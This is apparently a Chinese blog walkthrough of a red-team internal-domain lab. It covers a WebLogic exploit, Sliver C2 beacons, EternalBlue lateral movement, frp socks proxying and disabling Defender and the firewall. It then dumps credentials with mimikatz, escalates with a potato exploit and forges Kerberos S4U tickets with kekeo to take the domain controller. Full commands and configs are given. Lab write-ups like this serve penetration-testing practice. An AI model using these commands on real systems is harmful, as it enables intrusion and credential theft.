Sliver C2通关渗透攻击红队内网域靶场2.0
准备
2012 server
第一台机器开机后,要在C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain手动运行下 startWebLogic.cmd,但是我访问7001遇到了报错:
是路径配置错误,但是没搜到什么解决方法,全踏马互相抄互相抄。去问chatgpt,给出的解释是去访问http://127.0.0.1:7001/console
访问这个页面会开始部署,页面不停的刷新。
之后就可以成功的进入页面。
网卡也要配置,在控制面版中将网卡改成自动获取IP,他默认是10.10.0.12
windows 7 PC
也是一样的配置网卡,选择随机。需要输入认证:
先输入域账户:redteam\saul:admin!@#45
再输入域管的账户:Administrator:Admin12345
最后的配置:
win 2008 sql server
认证需要先输入域账户:redteam\sqlserver:Server12345
再输入本地管理员:Administrator:Admin12345
最后的配置:
除此之外要看看是否开启了sql server,在服务中查看有没有开启,且当前用户无权开启。
然后以管理员身份开cmd也启动不了。
sql server管理配置器中启动也不行
查看Windows日志,很多报错,看样子是时间调整了导致超过了180天不能使用了
此处版本不用更改,然后去搜密钥,这个老哥的可以用:传送门
之后就是下一步下一步然后确定即可,等待升级完成。此时再通过命令行启动就没有问题了。
net start MSSQLSERVER
域控
如下:
网络拓扑
| 名称 | ip1 | ip2 |
|---|---|---|
| ubuntu | 192.168.130.14 | / |
| win 2012 外网服务器 | 192.168.130.4 | 10.0.10.4 |
| win 7 个人PC | 10.0.10.5 | 10.0.20.5 |
| 邮件服务器 | 10.0.20.4 | / |
| 域控 | 10.0.20.6 | / |
外网打点
拿到目标IP192.168.130.4,Ubuntu启动,nmap启动,扫描之后看到开放的端口如下:
依次访问各个端口:
weblogic一把梭
上工具检测weblogic有没有历史漏洞,得到CVE-2016-0638有回显可以利用。
注入内存马
直接注入内存马用哥斯拉连接上去。
用哥斯拉自带的模块抓一下密码,但由于是win2012,系统会开启LSA保护,明文密码字段会显示null。不过这里可以看到是工作组环境。
派生至sliver上线
新建生成beacon的配置文件,使用配置文件来生成马子,通过哥斯拉上传执行来上线sliver。
信息收集
新建一个session会话,收集到存在第二个网段。
永恒之蓝横向
使用命令socks5 start开启代理,修改/etc/proxychains.conf,挂上代理扫这个c段,过滤物理机和当前机器。发现存在另外一个10.0.10.5且存在永恒之蓝。
看到开启了445端口,尝试用命名管道进行中转,生成对应的shellcode。
挂代理使用脚本去打,这个试了几次都超时了。
有点效果,给打蓝屏了,但是得不到shell。
使用go写的脚本也不行,对shellcode的大小有限制,即使是打个计算器都要等很久还失败了。
无奈使用msf,开启并挂上代理,指定正向马来开session。但是给sliver的session给整断掉了。
setg Proxies socks5:127.0.0.1:7878
setg ReverseSAllowProxy true
服务端配置如下:
[common]
bind_addr =192.168.130.14
bind_port = 7000
客户端配置如下,传到win 2012上执行。
[common]
server_addr = 192.168.130.14
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
再次挂上新的代理setg Proxies socks5:127.0.0.1:7777拿下了shell。
内网渗透
tcp中转马
但是传了几个马子上去都回连不上,尝试关闭defender和防火墙。sliver还是不够稳定,直接用shell就进不去会卡住,也不监听ctrl c来给用户取消,一退出去session就没了。使用execute就是对中文不友好会乱码。关闭之后就陆续有前面的马子回连了。
execute -o cmd /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
execute -o cmd /c netsh advfirewall show all state
execute -o cmd /c netsh advfirewall set allprofile state off
这里我删除之后尝试重新执行上传的马子,发现命名管道中转的都没有成功,最后只有使用tcp的可以上线:
内网信息收集
在本机继续收集信息,当前权限最高,可以抓一手密码。
获取凭据
msf中内置了mimikatz就不用再从sliver中传上去操作,抓到了密码Saul:admin!@#45。
出了点问题滚了快照,msf没配置成,临时配了个viper再打一次。查看域信息,发现存在域:
// 查看域用户
net user /domain
// 查看域控
net group "domain controllers" /domain
// 查看域管理员
net group "domain admins" /domain
sliver中还是一开shell就会卡死,但是可以用插件来收集:
查看进程,没有域管进程,无法窃取令牌。
横向移动
sliver方便的就是挂代理很方便,可以直接挂起开fscan来扫,这看到除了本机,物理机外还有两台机器,4为sql server,6就是域控了,同时扫出来sql server有弱口令sa;sa。
要想办法拿下域控,这里看到域控有web服务,但无法利用。
SQL server上则是一个2s。
用mimikatz只抓到了win7上sual的凭据没法接着利用,但可以用来查询域内被配置了委派的用户。看了一下shell那块的源码,可能是没有获取到cmd或者powershell的路径而卡住了:
尝试自己指定path,确实可以开启交互式shell了,但是传AdFind上去执行又卡了(其他命令还是正常的):
shell -s c:\\windows\\system32\\cmd.exe
execute执行成功后可以看到可以看到sqlserver被设置了约束委派:
execute -o AdFind.exe -h 10.0.20.6 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
弱口令接管SQL SERVER
那要想办法拿下这台SQL server,利用前面的弱口令来连接数据库。
生成中转马,通过工具上传上去。执行后上线。
EsfpPotato提权
sliver中自带的提权模块失败了,点击on plus加载工具中的esfPotato之后再次执行马子上线。
sliver的armory中没有mimikatz模块,为了方便使用,在/home/$user/.sliver-client/aliases下创建文件夹mimikatz,添加配置文件以及64和32位的mimikatz.exe,之后aliases load /home/\$user/.sliver-client/aliases/mimikatz。
{
"name": "Mimikatz",
"version": "2.2.0",
"command_name": "mimikatz",
"original_author": "gentilkiwi",
"repo_url": "https://github.com/gentilkiwi/mimikatz",
"help": "mimikatz is a tool I've made to learn C and make somes experiments with Windows security.",
"entrypoint": "Main",
"allow_args": true,
"default_args": "",
"is_reflective": false,
"is_assembly": true,
"files": [
{
"os": "windows",
"arch": "amd64",
"path": "mimikatz.exe"
},
{
"os": "windows",
"arch": "386",
"path": "mimikatz386.exe"
}
]
}
抓到密码Server12345:
mimikatz "privilege::debug" "serkurlsa::logonpasswords" "exit"
约束委派接管域控
拿到了密码,使用rubues老报错,故尝试使用kekeo 请求TGT,会在当前目录下产生一个TGT:TGT_sqlserver@READTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirib
k.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:sqlserver.kirbiex"
使用申请的TGT伪造administrator的服务票据
k.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red"
导入票据之前无法访问域控:
使用mimikatz导入伪造的票据,之后可以访问到域控。
kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
Sliver C2通关渗透攻击红队内网域靶场2.0的更多相关文章
- 【APT】NodeJS 应用仓库钓鱼,大规模入侵开发人员电脑,批量渗透各大公司内网
APT][社工]NodeJS 应用仓库钓鱼,大规模入侵开发人员电脑,批量渗透各大公司内网 前言 城堡总是从内部攻破的.再强大的系统,也得通过人来控制.如果将入侵直接从人这个环节发起,那么再坚固的防线, ...
- 对国外某hotel的内网域简单渗透
Penetration Testing不单单是一个博客,更热衷于技术分享的平台. 本文将讲述对国外某一hotel的渗透测试,让更多的人安全意识得到提高,有攻才有防,防得在好,也有疏忽的地方,这就是为啥 ...
- 得到内网域管理员的5种常见方法<转>
1.Netbios and LLMNR Name Poisoning 这个方法在WIN工作组下渗透很有用,WIN的请求查询顺序是下面三个步骤:本地hosts文件(%windir%\System32\d ...
- 内网域渗透之MS14-068复现
在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...
- 内网域渗透之MS14-068复现(CVE-2014-6324)
在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限.如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务 ...
- HW弹药库之红队作战手册
红方人员实战手册 声明 Author : By klion Date : 2020.2.15 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" ...
- 3.内网渗透之reGeorg+Proxifier
aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxIAAAE2CAIAAAB6BDOVAAAgAElEQVR4Aey9Z5Aex3X327MRGVzkRH ...
- beef + msf 实现内网渗透
在内网渗透方面,最为大众所知道的就是xp系统的ms08067漏洞,通过这个漏洞可以对未打上补丁的xp系统实现getshell, 但是经过笔者发现,这种漏洞攻击在被攻击机开上windows防火墙的时候是 ...
- vulstack红队评估(四)
一.环境搭建: ①根据作者公开的靶机信息整理 虚拟机密码: ubuntu: ubuntu:ubuntu win7: douser:Dotest123 Win2008 DC: administr ...
- 【渗透实战】记一次艰难的内网漫游第四期_蹭我WIFI?看我如何利用组合拳日进蹭网者内网
/文章作者:Kali_MG1937 CSDN博客ID:ALDYS4 QQ:3496925334/ 内网漫游系列第三期:[渗透实战]记一次艰难的内网漫游第三期_我是如何利用APT攻击拿到内网最高权限的 ...
随机推荐
- 解锁数据潜力:信息抽取、数据增强与UIE的完美融合
解锁数据潜力:信息抽取.数据增强与UIE的完美融合 1.信息抽取(Information Extraction) 1.1 IE简介 信息抽取是 NLP 任务中非常常见的一种任务,其目的在于从一段自然文 ...
- 2.6 CE修改器:代码注入功能
从本关开始,各位会初步接触到CE的反汇编功能,这也是CE最强大的功能之一.在第6关的时候我们说到指针的找法,用基址定位动态地址.但这一关不用指针也可以进行修改,即使对方是动态地址,且功能更加强大.代码 ...
- CE修改器入门:查找多级指针
本关是第6关的加强版,CE 6.X 教程中的4级指针比5.X的要简单些.多级指针就像玩解谜游戏一样,谜团不只一个,盒子中还有盒子.这里面是4级指针,游戏中也有比如8级指针,12级指针等等,思路都是一样 ...
- Python 实现指定窗口置顶激活
通过Python实现对特定窗口的置顶操作以及对特定窗体发送按键,这里需要安装一个第三方pip包,执行命令pywin32安装好以后,我们运行试试. 第一个案例,遍历所有句柄,然后对特定窗口进行最大化或最 ...
- 【scikit-learn基础】--『回归模型评估』之损失分析
分类模型评估中,通过各类损失(loss)函数的分析,可以衡量模型预测结果与真实值之间的差异.不同的损失函数可用于不同类型的分类问题,以便更好地评估模型的性能. 本篇将介绍分类模型评估中常用的几种损失计 ...
- Intel自曝未来三代酷睿!AI性能涨2倍、再涨2倍
根据最新财报数据,Intel 2023年第四季度154.1亿美元,同比增长10%,全年收入542亿美元,同比下跌14%,预计2024年第一季度收入122-132亿美元. 其中,酷睿处理器业务为主的CC ...
- AOKO奥科美2.5英寸外置硬盘盒开箱
上次在坛子里发布了一个帖子,然后根据坛友们的反馈,换购了另一个SATA固态硬盘.另一个是配套的硬盘盒,当时在某宝上搜了一圈,最终购买了这款硬盘盒,主要是因为它的外观,旁边有散热片.这款硬盘盒在某宝上不 ...
- cs50ai2
cs50ai2-------Uncertainty cs50ai2-------Uncertainty 基础知识 课后题目 代码实践 学习链接 总结 基础知识 在这节课中,前面主要介绍了一些概率论的基 ...
- 云计算 - 对象存储服务OSS技术全解
本文全面深入地探讨了对象存储服务(OSS)的核心技术.基础知识和高级功能.从媒体存储到数据备份,再到数据仓库与数据湖,我们不仅解析了OSS在各种应用场景下的关键角色,还深入讨论了其与机器学习.多媒体处 ...
- 小知识:TFA收集日志报错空间不足
今天在某客户环境下分析某节点驱逐的故障,发现有安装TFA,所以使用一键收集包含故障时刻的日志 tfactl diagcollect -from "2020-08-14 03:00:00&qu ...